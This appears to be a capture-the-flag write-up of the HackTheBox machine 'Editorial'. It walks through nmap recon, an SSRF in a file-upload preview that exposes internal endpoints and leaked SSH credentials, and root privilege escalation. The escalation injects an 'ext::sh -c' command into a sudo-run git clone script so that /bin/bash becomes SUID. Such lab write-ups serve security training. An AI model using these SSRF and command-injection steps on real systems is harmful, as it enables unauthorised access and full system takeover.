Editorial HTB Writeup

Описание изображения

HTB machine link:

https://app.hackthebox.com/machines/Editorial

Recon Link to heading

First, as usual, scan the target host with nmap

Описание изображения

From the output we get the name of the domain - editorial.htb

You can’t just log in like that, you need to add an entry to /etc/hosts

Описание изображения

This can be done with a single command

sudo echo "10.10.11.20 editorial.htb" | sudo tee -a /etc/hosts

Описание изображения

The site can now be accessed

Описание изображения

User flag Link to heading

The file upload functionality is immediately noticeable

Описание изображения

When we click on the “Preview” button, we get this request:

Описание изображения

Let’s try to enter our IP, on which we previously started the listener with the command nc -nlvp 4444

Описание изображения

We’re getting a bounce, looks like we got an SSRF vulnerability.

Описание изображения

Now let’s try to access the internal IP

Описание изображения

When you download the generated file, you can see the internal endpoints

Описание изображения

In one of these endpoints lie the ssh creds

Описание изображения

Описание изображения

They can be used to connect to the car and get the User flag.

Описание изображения

Описание изображения

Root flag Link to heading

bash -p
cd /root
cat root.txt

Описание изображения

Or, if no one’s been in the car before you, we do this:

grep -r "prod" ./

Описание изображения

cd ./apps/.git/logs

cat HEAD

Описание изображения

git show 1e84a036b2f33c59e2390730699a488c65643d28

Описание изображения

Описание изображения

echo '#!/bin/bash' > /tmp/exploit.sh 

echo 'chmod u+s /bin/bash' >> /tmp/exploit.sh  
  
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c '/tmp/exploit.sh'"  
  
ls -l /bin/bash
-rwsr-xr-x 1 root root 1396520 Mar 14 11:31 /bin/bash  
  
/bin/bash -p  
bash-5.1#